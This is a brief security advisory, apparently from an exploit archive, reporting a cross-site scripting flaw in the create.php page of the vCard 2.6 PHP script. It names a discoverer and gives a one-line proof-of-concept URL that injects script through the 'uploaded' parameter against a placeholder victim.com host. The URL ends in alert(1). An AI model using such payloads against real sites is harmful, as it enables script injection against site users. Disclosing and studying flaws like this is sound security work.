vCard version 2.6 suffers from a cross site scripting flaw.
e1147a89a3994e21c9d5b36eaee74aa8ed77228883fbe59a7cba3406729c9699
Discovered By : Hasadya Raed
Contact : RaeD@BsdMail.Com
Script: vCard 2.6 (c)2002
******************************************************************************
Bug in : create.php
********************************************************************************
Exploit :
http://www.victim.com/path/create.php?uploaded=">**********alert(1);</script>
********************************************************************************
--